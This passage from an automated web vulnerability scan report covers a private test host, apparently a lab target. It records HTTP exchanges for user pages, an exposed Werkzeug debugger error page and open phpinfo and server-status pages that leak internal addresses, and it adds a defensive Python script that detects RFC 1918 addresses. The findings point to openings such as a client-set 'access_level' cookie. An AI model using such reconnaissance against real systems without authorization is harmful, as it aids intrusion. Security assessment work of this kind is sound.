Date: Wed, 08 Nov 2017 11:56:28 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 50
Connection: close
Content-Type: text/html; charset=UTF-8

gpgkeys: key 958179F2 not found on keyserver<br/>
3.10.30. http://10.250.200.5:81/user/marge.aphrodite/me.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/me.jpg

Request 1

GET /user/marge.aphrodite/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: image/jpeg

3.10.31. http://10.250.200.5:81/user/rica.orpah

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah

Request 1

GET /user/rica.orpah HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:14:38 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>rica.orpah -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.10.32. http://10.250.200.5:81/user/rica.orpah/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/

Request 1

GET /user/rica.orpah/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:20 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>rica.orpah -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.10.33. http://10.250.200.5:81/user/rica.orpah/key.asc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/key.asc

Request 1

GET /user/rica.orpah/key.asc HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:21 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 50
Connection: close
Content-Type: text/html; charset=UTF-8

gpgkeys: key 94853B61 not found on keyserver<br/>
3.10.34. http://10.250.200.5:81/user/rica.orpah/me.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/me.jpg

Request 1

GET /user/rica.orpah/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: image/jpeg

3.10.35. http://10.250.200.5:81/user/ricca.gilud

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud

Request 1

GET /user/ricca.gilud HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:22:14 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1339
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>ricca.gilud -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.10.36. http://10.250.200.5:81/user/ricca.gilud/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/

Request 1

GET /user/ricca.gilud/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1339
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>ricca.gilud -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.10.37. http://10.250.200.5:81/user/ricca.gilud/key.asc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/key.asc

Request 1

GET /user/ricca.gilud/key.asc HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:48 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 50
Connection: close
Content-Type: text/html; charset=UTF-8

gpgkeys: key 9D4BB115 not found on keyserver<br/>
3.10.38. http://10.250.200.5:81/user/ricca.gilud/me.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/me.jpg

Request 1

GET /user/ricca.gilud/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: image/jpeg

3.10.39. http://10.250.200.5:81/user/stephi.fonda

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda

Request 1

GET /user/stephi.fonda HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:31:55 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1399
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>stephi.fonda -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.10.40. http://10.250.200.5:81/user/stephi.fonda/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/

Request 1

GET /user/stephi.fonda/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:24:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>stephi.fonda -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.10.41. http://10.250.200.5:81/user/stephi.fonda/key.asc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/key.asc

Request 1

GET /user/stephi.fonda/key.asc HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:28:35 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 50
Connection: close
Content-Type: text/html; charset=UTF-8

gpgkeys: key 33E301FC not found on keyserver<br/>
3.10.42. http://10.250.200.5:81/user/stephi.fonda/me.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/me.jpg

Request 1

GET /user/stephi.fonda/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: image/jpeg

3.10.43. http://10.250.200.5:8080/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /login

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
X-XSS-Protection: 0
Connection: close
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:34 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>KeyError: 'userNone_username' // Werkzeug Debugger</title>
<link
...[SNIP]...
3.11. Private IP addresses disclosed

There are 4 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organization, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organization can help an attacker in carrying out network-layer attacks aiming to penetrate the organization's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organization's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

In this report all four instances come from two diagnostic pages on port 81, phpinfo.php and the Apache mod_status handler at /server-status, both served to a client carrying only the access_level=0 cookie. Masking addresses is the wrong fix there: remove phpinfo.php from the deployment and restrict /server-status to administrative source addresses with Require ip (or unload mod_status), which closes the wider information leak along with the address disclosure.
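An added example, not part of the Burp report or of Burp itself, of the check behind this finding: a scan of a response body for RFC 1918 addresses. It runs over a constructed sample modelled on the /server-status response recorded below, in which the Client column carries the scanning host 10.250.100.116 and the VHost column the server's own backend address 172.18.0.6. The sample rows with 8.8.8.8, 172.32.0.1 and 192.168.300.1 are made up to exercise a public address, an address just outside 172.16.0.0/12, and a malformed quad. The exclude parameter and all function names are this example's own.

```python
import ipaddress
import re

# The three RFC 1918 blocks, matched explicitly. IPv4Address.is_private would
# also accept loopback, link-local, 0.0.0.0/8, 198.18.0.0/15 and others, which
# are not what this finding is about.
RFC1918_NETWORKS = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
)

# Dotted-quad candidates. The lookarounds stop a match from starting or ending
# inside a longer dotted run such as a version string "2.4.10.1234".
IPV4_CANDIDATE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def is_rfc1918(addr: str) -> bool:
    """True only for syntactically valid addresses inside an RFC 1918 block."""
    try:
        ip = ipaddress.IPv4Address(addr)
    except ipaddress.AddressValueError:
        return False          # e.g. an octet above 255
    return any(ip in net for net in RFC1918_NETWORKS)


def find_rfc1918(body: str, exclude=()) -> list:
    """Unique RFC 1918 addresses in body, in order of first appearance.

    exclude: addresses to ignore, typically the target host itself, which the
    tester already knows and which therefore is not a disclosure.
    """
    found = []
    for match in IPV4_CANDIDATE.finditer(body):
        addr = match.group(1)
        if addr in exclude or addr in found:
            continue
        if is_rfc1918(addr):
            found.append(addr)
    return found


# Constructed sample modelled on the /server-status response in this report:
# the scanner's address in the Client column, the backend's address in the
# VHost column, plus a public address, an out-of-range 172.x address and a
# malformed quad (the last three rows are made up).
SAMPLE_SERVER_STATUS = """<h1>Apache Server Status for 10.250.200.5 (via 172.18.0.6)</h1>
<dl><dt>Server Version: Apache/2.4.10 (Debian)</dt>
<tr><td>10.250.100.116</td><td nowrap>172.18.0.6:80</td></tr>
<tr><td>8.8.8.8</td><td nowrap>172.18.0.6:80</td></tr>
<tr><td>172.32.0.1</td><td nowrap>172.18.0.6:80</td></tr>
<tr><td>192.168.300.1</td><td nowrap>172.18.0.6:80</td></tr>
"""

if __name__ == "__main__":
    # Prints ['172.18.0.6', '10.250.100.116']; the target host is excluded.
    print(find_rfc1918(SAMPLE_SERVER_STATUS, exclude={"10.250.200.5"}))
```

Passing the target host in exclude keeps the report to addresses the tester did not already know; drop it to see every RFC 1918 address in the body.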



3.11.1. http://10.250.200.5:81/phpinfo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /phpinfo.php

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

172.18.0.6
10.250.100.116

Request 1

GET /phpinfo.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:06 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">172.18.0.6:80 </td>
...[SNIP]...
<td class="v">172.18.0.6 </td>
...[SNIP]...
<td class="v">10.250.100.116 </td>
...[SNIP]...
<td class="v">172.18.0.6</td>
...[SNIP]...
<td class="v">10.250.100.116</td>
...[SNIP]...
3.11.2. http://10.250.200.5:81/phpinfo.php/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /phpinfo.php/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

172.18.0.6
10.250.100.116

Request 1

GET /phpinfo.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">172.18.0.6:80 </td>
...[SNIP]...
<td class="v">172.18.0.6 </td>
...[SNIP]...
<td class="v">10.250.100.116 </td>
...[SNIP]...
<td class="v">172.18.0.6</td>
...[SNIP]...
<td class="v">10.250.100.116</td>
...[SNIP]...
3.11.3. http://10.250.200.5:81/server-status

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /server-status

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

172.18.0.6
10.250.100.116

Request 1

GET /server-status HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:51:37 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7411
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for 10.250.200.5 (via 172.18.0.6)</h1>

<dl><dt>Server Version:
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
3.11.4. http://10.250.200.5:81/server-status/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /server-status/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

172.18.0.6
10.250.100.116

Request 1

GET /server-status/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:02 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7404
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for 10.250.200.5 (via 172.18.0.6)</h1>

<dl><dt>Server Version:
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
<td>10.250.100.116</td><td nowrap>172.18.0.6:80</td>
...[SNIP]...
3.12. Robots.txt file

There are 2 instances of this issue:

Issue background

